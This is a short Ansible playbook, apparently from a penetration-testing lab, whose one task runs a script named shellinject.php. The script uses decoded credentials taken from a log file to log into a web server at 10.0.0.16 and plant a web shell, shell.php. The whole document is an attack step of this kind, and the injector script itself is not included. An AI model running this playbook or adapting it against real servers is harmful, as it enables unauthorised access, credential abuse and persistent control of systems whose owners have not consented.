---
#
# login web server
#
- name: implement shell injection to web server
  hosts: blackhat
  tasks:
    - name: log in web server using decoded username and password, inject web with shell file
      raw: php shellinject.php logs_decoded.txt 10.0.0.16/ shell.php